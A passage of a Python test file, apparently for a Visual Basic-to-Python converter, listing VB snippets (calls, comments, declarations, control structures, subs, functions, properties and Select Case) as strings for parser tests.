"a = myfunction()",
"a = myfunction(1,2,3,4)",
"a = myfunction(1,2,3,z:=4)",
"a = myfunction(x:=1,y:=2,z:=4)",
"a = myfunction(b(10))",
"a = myfunction(b _\n(10))",
])
# String Functions
tests.extend([
'a = Trim$("hello")',
'a = Left$("hello", 4)',
])
# Things that failed
tests.extend([
"a = -(x*x)",
"a = -x*10",
"a = 10 Mod 6",
])
# Address of
tests.extend([
"a = fn(AddressOf fn)",
"a = fn(a, b, c, AddressOf fn)",
"a = fn(a, AddressOf b, AddressOf c, AddressOf fn)",
"a = fn(a, AddressOf b.m.m, AddressOf c.k.l, AddressOf fn)",
])
# Type of
tests.extend([
"a = fn(TypeOf fn)",
"a = fn(a, b, c, TypeOf fn)",
"a = fn(a, TypeOf b, TypeOf c, TypeOf fn)",
"a = fn(a, TypeOf b.m.m, TypeOf c.k.l, TypeOf fn)",
"a = TypeOf Control Is This",
"a = TypeOf Control Is This Or TypeOf Control Is That",])
# << Parsing tests >> (3 of 61)
# Using ByVal and ByRef in a call or expression
tests.extend([
'a = fn(ByVal b)',
'a = fn(x, y, z, ByVal b)',
'a = fn(x, y, z, ByVal b, 10, 20, 30)',
'a = fn(ByVal a, ByVal b, ByVal c)',
'a = fn(ByRef b)',
'a = fn(x, y, z, ByRef b)',
'a = fn(x, y, z, ByRef b, 10, 20, 30)',
'a = fn(ByRef a, ByRef b, ByRef c)',
'fn ByVal b',
'fn x, y, z, ByVal b',
'fn x, y, z, ByVal b, 10, 20, 30',
'fn ByVal a, ByVal b, ByVal c',
'fn ByRef b',
'fn x, y, z, ByRef b',
'fn x, y, z, ByRef b, 10, 20, 30',
'fn ByRef a, ByRef b, ByRef c',
])
# << Parsing tests >> (4 of 61)
# One line comments
tests.append("""
a = 10
' b = 20+30
' c = "hello there"
' oneVal = 10
twoVals = Array(10,20)
' functioncall = myfunction.mymethod(10)
""")
# One line comments with Rem
tests.append("""
a = 10
Rem b = 20+30
Rem not needed c = "hello there"
Rem opps oneVal = 10
twoVals = Array(10,20)
Rem dont do this anymore functioncall = myfunction.mymethod(10)
""")
# In-line comments
tests.append("""
a = 10
b = 20+30 ' comment
c = "hello there" ' another comment
oneVal = 10 ' yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# In-line comments with Rem
tests.append("""
a = 10
b = 20+30 Rem comment
c = "hello there" Rem another comment
oneVal = 10 Rem yet another comment
twoVals = Array(10,20)
functioncall = myfunction.mymethod(10)
""")
# Things which aren't comments
tests.append("""
a = "hello, this might ' look like ' a comment ' "
b = "wow there are a lot of '''''''' these here"
""")
# tough inline comments
tests.extend([
"Public a As Integer ' and a comment"
])
# comments in awkward places
tests.extend([
"""
If a =0 Then ' nasty comment
b=1
End If ' other nasty comment
""",
"""
While a<0 ' nasty comment
b=1
Wend ' other nasty comment
""",
"""
Select Case a ' nasty comment
Case 10 ' oops
b=1
Case Else ' other nasty comment
b = 2
End Select ' gotcha
""",
"""
For i = 0 To 100 ' nasty comment
b=1
Next i ' other nasty comment
""",
"""
Sub a() ' nasty comment
b=1
End Sub ' other nasty comment
""",
"""
Function f() ' nasty comment
b=1
End Function ' other nasty comment
""",
])
# << Parsing tests >> (5 of 61)
# Directives
tests.extend([
"' VB2PY-Set General.Blah = Yes",
"' VB2PY-Set General.Blah = ___",
"' VB2PY-Unset General.Blah",
"' VB2PY-Add: General.Option = 10",
])
# << Parsing tests >> (6 of 61)
# Two line continuations
tests.append("""
a = _
10 + 20 + 30
b = 10/ _
25
c = (one + _
two + three)
""")
# Milti-line continuations
tests.append("""
a = _
10 + 20 + 30 _
* 10/ _
25
c = (one + _
two + three) * _
four.five()
""")
tests.extend(["""
Private Declare Function GetTempPathA Lib "kernel32" _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
""",
"""
Function GetTempPathA _
(ByVal nBufferLength As Long, ByVal lpBuffer As String) As Long
End Function
""",
])
# << Parsing tests >> (7 of 61)
# Simple dims
tests.extend([
"Dim A",
"Dim B As String",
"Dim variable As Object.OtherObj",
"Dim Var As Variant",
"Dim A As String * 100",
])
# Dims with New
tests.extend([
"Dim A As New Object",
"Dim B As New Collection",
])
# Multiple dims on one line
tests.extend([
"Dim A, B, C, D, E, F",
"Dim B As String, B As Long, B As Integer, B As String, B As String",
"Dim variable As Object.OtherObj, B, C, D, E",
"Dim Var As Variant",
"Dim A, B, C As New Collection",
"Dim E As New Collection, F As New Object, F, G",
"Dim H As New Object, G As New Object",
])
# Array type dims
tests.extend([
"Dim A()",
"Dim B(10, 20, 30) As String",
"Dim variable() As Object.OtherObj",
"Dim Var(mysize) As Variant",
])
# Scoped dims
tests.extend([
"Public A",
"Private B As String",
"Private A, B, C, D, E, F",
"Private B As String, B As Long, B As Integer, B As String, B As String",
"Private variable As Object.OtherObj, B, C, D, E",
"Public Var As Variant",
])
# Static dims
tests.extend([
"Static A",
"Static B As String",
"Static A, B, C, D, E, F",
"Static B As String, B As Long, B As Integer, B As String, B As String",
"Static variable As Object.OtherObj, B, C, D, E",
"Static Var As Variant",
])
# << Parsing tests >> (8 of 61)
# Arrays
tests.extend([
"Dim a(10)",
"Dim a(0)",
"Dim a(0), b(20), c(30)",
"Dim a(10+20)",
"Dim a(10+20, 1+3)",
"Dim a(1 To 10)",
"Dim a(1 To 10, 5 To 20)",
])
# Redims
tests.extend([
"ReDim a(10)",
"ReDim a(0)",
"ReDim Preserve a(20)",
"ReDim a(0), b(20), c(30)",
"ReDim Preserve a(20), b(20)",
"ReDim a(10+20)",
"ReDim a(10+20, 1+3)",
"ReDim a(1 To 10)",
"ReDim a(1 To 10, 5 To 20)",
"ReDim a(10).b(10)",
])
# Complex examples
tests.extend([
"""
With Obj
ReDim .Child(10)
End With
""",
])
# << Parsing tests >> (9 of 61)
# Constants with different types
tests.extend([
"Const a = 10",
'Const a = "Hello"',
"Const a = &HA1",
"Const a = 1#",
"Const a = 1%",
"Const a = 1&",
"Public Const a = 10",
'Public Const a = "Hello"',
"Public Const a = &HA1",
"Public Const a = 1#",
"Public Const a = 1%",
"Public Const a = 1&",
"Private Const a = 10",
'Private Const a = "Hello"',
"Private Const a = &HA1",
"Private Const a = 1#",
"Private Const a = 1%",
"Private Const a = 1&",
])
# Constants
tests.extend([
"Const A = 20",
'Const B = "one"',
"Private Const A = 1234.5 + 20",
"Const a=10, b=20, c=30",
"Private Const a=10, b=20, d=12345",
])
# Typed Constants
tests.extend([
"Const A As Long = 20",
'Const B As String = "one"',
"Private Const A As Single = 1234.5 + 20",
'Const a As Integer = 10, b As String = "hello", c As String * 10 = 43',
'Private Const a As Integer = 10, b As String = "hello", c As String * 10 = 43',
])
# << Parsing tests >> (10 of 61)
# Odds and ends
tests.extend([
"Private WithEvents A As Button",
])
# << Parsing tests >> (11 of 61)
# Bare calls
tests.extend([
"subr",
"object.method",
"object.method.method2.method",
])
# Explicit bare calls
tests.extend([
"Call subr",
"Call object.method",
"Call object.method.method2.method",
])
# Bare calls with arguments
tests.extend([
"subr 10, 20, 30",
"object.method a, b, c+d, e",
'object.method.method2.method 10, "hello", "goodbye" & name',
])
# Explicit calls with arguments
tests.extend([
"Call subr(10, 20, 30)",
"Call object.method(a, b, c+d, e)",
'Call object.method.method2.method(10, "hello", "goodbye" & name)',
"Call subr()",
])
# Bare calls with arguments and functions
tests.extend([
"subr 10, 20, 30",
"object(23).method a, b, c+d, e",
'object.method(5, 10, 20).method2.method 10, "hello", "goodbye" & name',
])
# Bare calls with named arguments and functions
tests.extend([
"subr 10, 20, z:=30",
"object(23).method one:=a, two:=b, three:=c+d, four:=e",
'object.method(5, 10, 20).method2.method 10, "hello", two:="goodbye" & name',
])
# Bare calls with ommitted arguments
tests.extend([
"subr 10, , 30",
"subr ,,,,0",
"subr 10, , , , 5",
])
# << Parsing tests >> (12 of 61)
# labels
tests.extend([
"label:",
"label20:",
"20:",
"label: a=1",
"20: a=1",
"101: doit",
"101:\ndoit",
"102: doit now",
"103: doit now, for, ever",
])
# Goto's
tests.extend([
"GoTo Label",
"GoTo 20",
"GoTo Label:",
"GoTo 20:",
])
# Structures with labels
tests.extend([
"""
101: If a < 10 Then
102: b=1
103: End If
""",
"""
101: While a < 0
102: b=1
103: Wend
""",
"""
101: Select Case a
102: Case 10
103: b= 1
104: Case Else
105: b=2
103: End Select
""",
"""
101: For i = 0 To 100
102: b=1
103: Next i
""",
"""
101: Sub a()
102: b=1
103: End Sub
""",
])
# Numeric labels don't even need a ':' ... aarg!
tests.extend([
"""
101 If a < 10 Then
102 b=1
103 End If
""",
"""
101 While a < 0
102 b=1
103 Wend
""",
"""
101 Select Case a
102 Case 10
103 b= 1
104 Case Else
105 b=2
103 End Select
""",
"""
101 For i = 0 To 100
102 b=1
103 Next i
""",
"""
101 Sub a()
102 b=1
103 End Sub
""",
])
# << Parsing tests >> (13 of 61)
# simple multi-line statements
tests.extend([
"a = 10: b = 20",
"a = 10: b = 20: c=1: d=1: e=2",
"a=10:",
"a=10: b=20:",
])
# Blocks on a line
tests.extend([
"For i = 0 To 10: b=b+i: Next i",
"If a > b Then a = 10: b = 20"
])
# Bug #809979 - Line ending with a colon fails
tests.extend([
"a = 10:\nb = 20",
"a = 10: b = 20:\nc=1: d=1: e=2",
"a=10:\nb=20:\nc=1",
])
# << Parsing tests >> (14 of 61)
# open statements
tests.extend([
"Open fn For Output As 12",
"Open fn For Output As #12",
"Open fn For Input As 12",
"Open fn For Input As #12",
"Open fn.gk.gl() For Input As #NxtChn()",
"Open fn For Append Lock Write As 23",
"Open fn For Random As 23 Len = 1234",
"Close 1",
"Close #1",
"Close channel",
"Close #channel",
"Close",
"Close\na=1",
"Closet = 10",
])
# Bug #810968 Close #1, #2 ' fails to parse
tests.extend([
"Close #1, #2, #3, #4",
"Close 1, 2, 3, 4",
"Close #1, 2, #3, 4",
"Close #one, #two, #three, #four",
"Close one, two, three, four",
"Close #1,#2,#3,#4",
"Close #1 , #2 , #3 , #4 ",
])
# << Parsing tests >> (15 of 61)
# print# statements
tests.extend([
"Print 10",
"Print #1, 10",
"Print 10, 20, 30;",
"Print #1, 10, 20, 30;",
"Print #1, 10; 20; 30;",
"Print #1, 10; 20; 30; 40, 50, 60, 70; 80; 90",
"Print 10, 20, 30,",
"Print 10, 20, 30",
"Print",
"Print ;;;",
"Print ,,,",
"Print 1,,,2,,,3,,,;",
"Print #3,",
"Print #3,;;;",
"Print #3,,,",
"Print #3,1,,,2,,,3,,,;",
])
# get# statements
tests.extend([
"Get #1, a, b",
"Get #1, , b",
])
# input # statements
tests.extend([
"Input #1, a, b",
"Input #1, b",
"a = Input(20, #3)",
"a = Input(20, #id)",
])
# line input # statements
tests.extend([
"Line Input #1, b",
])
# Seek
tests.extend([
"Seek #filenum, value",
"10: Seek #filenum, value",
"10: Seek #filenum, value ' comment",
"Seek #filenum, value ' comment",
])
# << Parsing tests >> (16 of 61)
tests.extend([
'Private Declare Function FileTimeToSystemTime Lib "kernel32" (ftFileTime As FILETIME, stSystemTime As SYSTEMTIME) As Long',
'Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)',
'Private Declare Function GetFileAttributes Lib "kernel32" Alias "GetFileAttributesA" (ByVal lpFileName As String) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String, A) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String , A) As Long',
'Private Declare Function GetFileAttributes Lib "kernel32" _ \n(ByVal lpFileName As String ) As Long',
])
# << Parsing tests >> (17 of 61)
# General on error goto
tests.extend([
"On Error GoTo 100",
"On Error GoTo ErrTrap",
"On Error GoTo 100 ' comment",
"On Error GoTo ErrTrap ' comment",
"100: On Error GoTo 100",
"label: On Error GoTo ErrTrap",
"100: On Error GoTo 100 ' comment",
"label: On Error GoTo ErrTrap ' comment",
])
# General on error resume next
tests.extend([
"On Error Resume Next",
"On Error Resume Next ' comment",
"100: On Error Resume Next",
"label: On Error Resume Next",
"100: On Error Resume Next ' comment",
"label: On Error Resume Next ' comment",
])
# General on error goto -
tests.extend([
"On Error GoTo 0",
"On Error GoTo 0 ' comment",
"100: On Error GoTo 0",
"100: On Error GoTo 0 ' comment",
])
# On something goto list
tests.extend([
"On var GoTo 20",
"On var GoTo 10,20,30,40",
])
# Resume
tests.extend([
"label: Resume Next",
"Resume Next",
"label: Resume Next ' Comment",
"label: Resume 7",
"Resume 7",
"label: Resume 7 ' Comment",
"label: Resume",
"Resume\na=1",
"label: Resume' Comment",
])
# General on local error resume next
tests.extend([
"On Local Error Resume Next",
"On Local Error Resume Next ' comment",
"100: On Local Error Resume Next",
"label: On Local Error Resume Next",
"100: On Local Error Resume Next ' comment",
"label: On Local Error Resume Next ' comment",
])
# Bug #809979 - On Error with : after the label fails
tests.extend([
"On Error GoTo 0:\na=1",
"On Error GoTo 0: ' comment",
"100: On Error GoTo 0:\na=1",
"100: On Error GoTo 0: ' comment",
"On Error GoTo lbl:\na=1",
"On Error GoTo lbl: ' comment",
"100: On Error GoTo lbl:\na=1",
"100: On Error GoTo lbl: ' comment",
])
# << Parsing tests >> (18 of 61)
# Lines
tests.extend([
"Line (10,20)-(30,40), 10, 20",
"obj.Pset (10, 20), RGB(1,2,2)",
])
# Move
tests.extend([
"Move (Screen.Width - Width) / 2, (Screen.Height - Height) / 2",
])
# << Parsing tests >> (19 of 61)
# General name test (rename a file)
tests.extend([
"Name file As otherfile",
"Name file & extension As otherfile",
"Name file & extension As otherfile & otherextension",
'Name path & "\origname.txt" As path & "\knewname.txt"',
])
# << Parsing tests >> (20 of 61)
# Attributes at the head of a file
tests.extend([
'Attribute VB_Name = "frmMain"',
'Attribute VB_GlobalNameSpace = False',
'Attribute VB_Creatable = False',
'Attribute VB_PredeclaredId = True',
'Attribute VB_Exposed = False',
'Attribute Me.VB_Exposed = False',
'Attribute Me.VB_Exposed = False, 1, 2, 3, 4',
'Attribute Me.VB_Exposed = False, "1", "2, 3,", 4',
])
# << Parsing tests >> (21 of 61)
# Attributes at the head of a file
tests.extend([
"""
Enum thing
_one = 1
_two = 2
_three = 3
_four = 4
End Enum
""",
"""
Enum thing
_one
_two
_three
_four
End Enum
""",
])
# << Parsing tests >> (22 of 61)
# Types
tests.extend([
"""
Private Type ShellFileInfoType
hIcon As Long
iIcon As Long
dwAttributes As Long
szDisplayName As String * 260
szTypeName As String * 80
End Type
"""
])
# << Parsing tests >> (23 of 61)
# The Option statement
tests.extend([
"Option Base 0",
"Option Base 1",
"Option Explicit",
"Option String Compare",
"Option String Compare Text",
])
# << Parsing tests >> (24 of 61)
# The End statement
tests.extend([
"10: End",
"End",
"End ' wow this is it",
"10: End ' this is the end",
])
# If with an 'End' in there
tests.append("""
If a = 10 Then
End
End If
""")
# Sub with an 'End' in there
tests.append("""
Sub doit()
End
End Sub
""")
# Fn with an 'End' in there
tests.append("""
Function doit()
End
End Function
""")
# With with an 'End' in there
tests.append("""
With obj
End
End With
""")
# << Parsing tests >> (25 of 61)
# The Event statement
tests.extend([
"Event doit()",
"Public Event doit()",
"Private Event doit()",
"Public Event doit(a, b, c, e)",
"Public Event doit(a As Integer, b As Long, c(), e As Command.Button)",
])
# << Parsing tests >> (26 of 61)
# The Debug.Print statement
tests.extend([
"Debug.Print",
"Debug.Print a",
"Debug.Print a,b",
"Debug.Print a;b",
"Debug.Print a+10;b+20",
"Debug.Print a+20, b-20",
"Debug.Print a;b;",
])
# << Parsing tests >> (27 of 61)
# Recordset notation
tests.extend([
"RS!diskID = DriveID",
"RS!diskID = DriveID+10",
'RS!diskID = "DriveID"',
])
# << Parsing tests >> (28 of 61)
# Unicode
tests.extend([
'cIÅ = 10',
'a = cIÅ + 30',
'a = "cIÅ there"',
])
# Unicode sub
tests.append("""
Sub cIÅ()
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (29 of 61)
# Simple If
tests.append("""
If a = 10 Then
b = 20
End If
If c < 1 Then
d = 15
End If
""")
# Empty If
tests.append("""
If a = 10 Then
End If
""")
# Empty If with comments
tests.append("""
If a = 10 Then ' comment here
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
End If
If c < 1 Or d Then
d = 15
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
""")
# If Not
tests.append("""
If Not a = 10 Then
b=2
End If
""")
# If With labels and comment
tests.append("""
10: If Not a = 10 Then 'heres a comment
20: b=2 ' antoher here
30: End If ' here too
""")
# << Parsing tests >> (30 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
Else
b = 10
End If
If c < 1 Then
d = 15
Else
d = -12
End If
""")
# Empty If/Else
tests.append("""
If a = 10 Then
Else
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
Else
b = 1234
End If
If c < 1 Or d Then
d = 15
Else
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
Else
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
Else
h = 1234
End If
""")
# << Parsing tests >> (31 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
End If
""")
# << Parsing tests >> (32 of 61)
# Simple If/Else
tests.append("""
If a = 10 Then
b = 20
ElseIf a < 10 Then
b = 10
Else
b = 1111
End If
If c < 1 Then
d = 15
ElseIf c = 1 Then
d = -12
Else
d = "wow"
End If
""")
# Simple If with And/Or
tests.append("""
If a = 10 And k = "test" Then
b = 20
ElseIf b = -102 Then
b = 1234
Else
b = 4321
End If
If c < 1 Or d Then
d = 15
ElseIf e = Myfunction Then
e = "hello"
Else
g = 1
End If
""")
# Simple If with compount And/Or expression
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
g = 12
Else
k = 3234
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
doIt
End If
""")
# << Parsing tests >> (33 of 61)
# Simple Nested If
tests.append("""
If a = 10 Then
b = 20
If c < 1 Then
d = 15
End If
End If
""")
# Complex nested If
tests.append("""
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
ElseIf (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
ElseIf k < 43 Then
h = 1234
Else
If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
End If
If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
End If
End If
Else
k = 3234
End If
""")
# << Parsing tests >> (34 of 61)
# Inline ifs
tests.extend([
"If a = 10 Then b = 20",
"If a = 20 And b = 5 Then d = 123",
"If a = 12 Then d = 1 Else g = 5",
"If a = 10 Then doit",
"If a = 10 Then doit 10, 20, 30",
"If a = 10 Then doit Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont",
"If a = 10 Then doit 10, 20, 30 Else dont 5, 10, 15",
"If a = 10 Then Exit Function",
"If a = 10 Then Exit Function Else DoIt",
"If a = 10 Then Exit Function Else DoIt=1",
"If a = 10 Then Exit Function Else DoIt 1, 2, 3",
"If a = 10 Then DoIt Else Exit Function",
"If a = 10 Then DoIt=1 Else Exit Function",
"If a = 10 Then DoIt 1,2,34 Else Exit Function",
])
# Weird inline if followed by assignment that failed once
tests.extend([
"If a = 10 Then b a\nc=1",
])
# << Parsing tests >> (35 of 61)
# #If
tests.append("""
#If a = 10 Then
b = 20
#Else
c=2
#End If
#If c < 1 Then
d = 15
#Else
c=2
#End If
""")
# Empty #If
tests.append("""
#If a = 10 Then
#Else
c=2
#End If
""")
# Empty #If with comments
tests.append("""
#If a = 10 Then ' comment here
#Else
c=2
#End If
""")
# Simple #If with And/Or
tests.append("""
#If a = 10 And k = "test" Then
b = 20
#Else
c=2
#End If
#If c < 1 Or d Then
d = 15
#Else
c=2
#End If
""")
# Simple #If with compount And/Or expression
tests.append("""
#If (a = 10 And k = "test") And (c Or b Or e = 43.23) Then
b = 20
#Else
c=2
#End If
#If (c < 1) Or d And e = "hello" Or e < "wow" Then
d = 15
#Else
c=2
#End If
""")
# #If Not
tests.append("""
#If Not a = 10 Then
b=2
#Else
c=2
#End If
""")
# << Parsing tests >> (36 of 61)
# simple sub
tests.append("""
Sub MySub()
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub()
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.extend(["""
Private Sub MySub()
a=10
n=20
c="hello"
End Sub""",
"""
Public Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Friend Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
"""
Private Static Sub MySub()
a=10
n=20
c="hello"
End Sub
""",
])
# simple sub with gap in ()
tests.append("""
Sub MySub( )
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (37 of 61)
# simple sub
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (38 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x As Single, y, z As Object, a, b As MyThing.Object, c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, y As Variant, z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (39 of 61)
# simple sub
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b As Variant, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with exit
tests.append("""
Sub MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c)
a=10
n=20
Exit Sub
c="hello"
End Sub
""")
# simple sub with scope
tests.append("""
Private Sub MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long)
a=10
n=20
c="hello"
End Sub
Public Sub MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Sub
""")
# simple sub with optional arguments and defaults
tests.append("""
Sub MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (40 of 61)
# ByVal, ByRef args
tests.append("""
Sub MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a, y)
a=10
n=20
c="hello"
End Sub
""")
tests.append("""
Sub MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (41 of 61)
# 852166 Sub X<spc>(a,b,c) fails to parse
tests.append("""
Sub MySub (ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# 880612 Continuation character inside call
tests.append("""
Sub MySub _
(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Sub
""")
# << Parsing tests >> (42 of 61)
# simple fn
tests.append("""
Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# simple fn with exit
tests.append("""
Function MyFn()
a=10
n=20
MyFn = 20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.extend(["""
Private Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function""",
"""
Public Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
"""
Friend Function MyFn()
a=10
n=20
c="hello"
MyFn = 20
End Function
""",
])
# simple fn with gap in ()
tests.append("""
Function MyFn( )
a=10
n=20
c="hello"
MyFn = 20
End Function
""")
# << Parsing tests >> (43 of 61)
# simple sub
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x, y, z, a, b, c)
a=10
n=20
Exit Sub
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
Public Function fn(x, y, z, a, b, c)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (44 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function fc(x As Single, y, z As Object, a, b As MyThing.Object, c) As Object.Obj
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, y As Variant, z, a As Boolena, b, c As Long) As Variant
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As String
a=10
n=20
c="hello"
End Function
""")
# function returning an array
tests.append("""
Function fn(x As Single, y, z As Boolean, a, b As Variant, c) As Single()
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (45 of 61)
# simple sub
tests.append("""
Function fn(x As Single, y, z As Boolean, a, Optional b As Variant, c) As Single
a=10
n=20
c="hello"
End Function
""")
# simple sub with exit
tests.append("""
Function MySub(x() As Single, y, z As Object, Optional a, b As MyThing.Object, Optional c) As Integer
a=10
n=20
Exit Function
c="hello"
End Function
""")
# simple sub with scope
tests.append("""
Private Function MySub(x, Optional y As Variant, Optional z, a As Boolena, b, c As Long) As Long
a=10
n=20
c="hello"
End Function
Public Function MySub(x, y, z, a, b, c) As Control.Buttons.BigButtons.ThisOne
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c="hello")
a=10
n=20
c="hello"
End Function
""")
# simple fn with optional arguments and defaults
tests.append("""
Function MySub(x As Single, y, z As Boolean, a, Optional b = 10, Optional c As String = "hello")
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (46 of 61)
# ByVal, ByRef args
tests.append("""
Function MySub(ByVal a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(a, ByRef y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a, y)
a=10
n=20
c="hello"
End Function
""")
tests.append("""
Function MySub(ByVal a As Single, y)
a=10
n=20
c="hello"
End Function
""")
# << Parsing tests >> (47 of 61)
# Simple property let/get/set
tests.extend(["""
Property Let MyProp(NewVal As String)
a = NewVal
Exit Property
End Property
""",
"""
Property Get MyProp() As Long
MyProp = NewVal
Exit Property
End Property
""",
"""
Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
Exit Property
End Property
"""
"""
Public Property Let MyProp(NewVal As String)
a = NewVal
End Property
""",
"""
Public Property Get MyProp() As Long
MyProp = NewVal
End Property
""",
"""
Public Property Set MyProp(NewObject As Object)
Set MyProp = NewVal
End Property
""",
"""
Public Property Get MyProp( ) As Long
MyProp = NewVal
End Property
""",
])
# Simple property let/get/set with labels
tests.extend(["""
1: Property Let MyProp(NewVal As String)
1: a = NewVal
1: End Property
""",
"""
1: Property Get MyProp() As Long
1: MyProp = NewVal
1: End Property
""",
"""
1: Property Set MyProp(NewObject As Object)
1: Set MyProp = NewVal
1: End Property
"""
])
# Simple property let/get/set with labels and comment
tests.extend(["""
1: Property Let MyProp(NewVal As String) ' comment
1: a = NewVal ' comment
1: End Property ' comment
""",
"""
1: Property Get MyProp() As Long ' comment
1: MyProp = NewVal ' comment
1: End Property ' comment
""",
"""
1: Property Set MyProp(NewObject As Object) ' comment
1: Set MyProp = NewVal ' comment
1: End Property ' comment
"""
])
# << Parsing tests >> (48 of 61)
# Simple case
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
End Select
""")
# Simple case with else
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three"
z = 3
Case Else
z = -1
End Select
""")
# Simple case with else and trailing colons
tests.append("""
Select Case x
Case "one":
y = 1
Case "two":
y = 2
Case "three":
z = 3
Case Else:
z = -1
End Select
""")
# Multiple case with else
tests.append("""
Select Case x
Case "one"
y = 1
Case "two"
y = 2
Case "three", "four", "five"
z = 3
Case Else
z = -1
End Select
""")
# Single line case with else
tests.append("""
Select Case x
Case "one": y = 1
Case "two": y = 2
Case "three", "four", "five": z = 3
Case Else: z = -1
End Select
""")
